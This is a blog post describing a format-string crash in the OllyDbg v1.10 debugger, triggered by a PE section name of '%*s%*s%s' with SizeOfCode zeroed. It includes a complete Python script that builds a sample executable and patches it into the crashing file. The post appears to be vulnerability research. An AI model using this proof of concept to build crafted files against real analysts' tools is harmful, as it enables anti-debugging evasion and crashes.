Monday, March 19, 2012

OllyDbg Section Name Crash

This is an old but interesting bug in OllyDbg. It affects OllyDbg v1.10 even with the OllyAdvanced v1.27 plugin loaded and its options enabled.

Here is a screenshot of the vulnerable code.
In brief: set the 8-byte Name field of the code section's IMAGE_SECTION_HEADER to "%*s%*s%s" and the SizeOfCode field of the optional header to zero, then open the file in OllyDbg. The name is exactly eight bytes, so it fills the field with no terminator, and it is handed to a printf-style routine as the format string: each "%s" dereferences whatever happens to be on the stack as its argument, and the debugger crashes.
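As an added example (not code from the original post or from the OllyDbg project), the Python script below builds a small constructed PE32 image, applies the two header changes described above to a copy of it, and counts how many variadic arguments a printf-style function would pull for that section name. The header offsets come from the PE/COFF layout; the sample image, the function names and the script name are this example's own.

```python
import struct
import sys

IMAGE_SCN_CNT_CODE = 0x00000020
SECTION_HEADER_SIZE = 40
CRASH_NAME = b"%*s%*s%s"   # 8 bytes: fills IMAGE_SECTION_HEADER.Name with no NUL terminator


def printf_arg_count(fmt: bytes) -> tuple:
    """Return (total varargs, pointer varargs) a printf-style routine would consume for fmt.
    Handles '%%', a '*' width and a '*' precision, which is enough for section-name payloads."""
    total, pointers, i = 0, 0, 0
    while i < len(fmt):
        if fmt[i:i + 1] != b"%":
            i += 1
            continue
        i += 1
        if fmt[i:i + 1] == b"%":                   # literal percent, consumes nothing
            i += 1
            continue
        while i < len(fmt) and fmt[i:i + 1] in b"-+ #0":   # flags
            i += 1
        if fmt[i:i + 1] == b"*":                   # width read from an int argument
            total += 1
            i += 1
        while i < len(fmt) and fmt[i:i + 1].isdigit():
            i += 1
        if fmt[i:i + 1] == b".":                   # optional precision
            i += 1
            if fmt[i:i + 1] == b"*":
                total += 1
                i += 1
            while i < len(fmt) and fmt[i:i + 1].isdigit():
                i += 1
        total += 1                                 # the conversion itself
        if fmt[i:i + 1] in (b"s", b"S", b"p", b"n"):
            pointers += 1                          # these dereference their argument
        i += 1
    return total, pointers


def build_minimal_pe() -> bytes:
    """Constructed sample: a tiny PE32 with one executable .text section (not a real program)."""
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 0, 0,                 # Magic (PE32), linker versions
                      0x200, 0, 0,                 # SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData
                      0x1000, 0x1000, 0x2000,      # AddressOfEntryPoint, BaseOfCode, BaseOfData
                      0x400000, 0x1000, 0x200,     # ImageBase, SectionAlignment, FileAlignment
                      4, 0, 0, 0, 4, 0,            # OS / image / subsystem versions
                      0, 0x2000, 0x200, 0,         # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
                      2, 0,                        # Subsystem (GUI), DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000,  # stack / heap reserve and commit
                      0, 0)                        # LoaderFlags, NumberOfRvaAndSizes (no directories)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                       0, 0, 0, 0, 0x60000020)     # CODE | EXECUTE | READ
    headers = (dos + b"PE\x00\x00" + file_hdr + opt + text).ljust(0x200, b"\x00")
    return headers + b"\xC3".ljust(0x200, b"\x00")  # one RET as the section body


def read_pe(data: bytes) -> dict:
    """Parse just enough of the headers to report SizeOfCode and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    fh = e_lfanew + 4
    nsect = struct.unpack_from("<H", data, fh + 2)[0]
    opt_size = struct.unpack_from("<H", data, fh + 16)[0]
    opt = fh + 20
    sections = []
    for i in range(nsect):
        off = opt + opt_size + SECTION_HEADER_SIZE * i
        name, chars = data[off:off + 8], struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, chars))
    return {"optional_header": opt, "SizeOfCode": struct.unpack_from("<I", data, opt + 4)[0],
            "sections_at": opt + opt_size, "sections": sections}


def patch_code_section(data: bytes, name: bytes = CRASH_NAME) -> bytes:
    """Apply the post's recipe: rename the first code section to `name`, zero SizeOfCode."""
    if len(name) > 8:
        raise ValueError("section names are at most 8 bytes")
    hdr = read_pe(data)
    buf = bytearray(data)
    struct.pack_into("<I", buf, hdr["optional_header"] + 4, 0)   # SizeOfCode = 0 (same offset for PE32/PE32+)
    for i, (_, chars) in enumerate(hdr["sections"]):
        if chars & IMAGE_SCN_CNT_CODE:
            off = hdr["sections_at"] + SECTION_HEADER_SIZE * i
            buf[off:off + 8] = name.ljust(8, b"\x00")
            return bytes(buf)
    raise ValueError("no code section found")


if __name__ == "__main__":
    # Usage (hypothetical script name): python patch_pe.py in.exe out.exe
    src = open(sys.argv[1], "rb").read() if len(sys.argv) > 2 else build_minimal_pe()
    out = patch_code_section(src)
    open(sys.argv[2] if len(sys.argv) > 2 else "crash.exe", "wb").write(out)
    print("name pulls %d varargs, %d of them pointers" % printf_arg_count(CRASH_NAME))
```

The patched file is only meant to be opened in the vulnerable debugger inside a throwaway VM; with SizeOfCode zeroed it is not expected to run as a program. The argument count is the point of the name: `%*s%*s%s` makes a printf-style routine fetch five arguments it was never given, three of which are dereferenced as string pointers.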

A demo can be found here.

You can follow me on Twitter @waleedassar 

2 comments:

  1. I came across the exact bug recently, and figured to remove the format-string section name, but how did you locate the bug?

    1. Just reversing the function responsible for parsing PE headers.
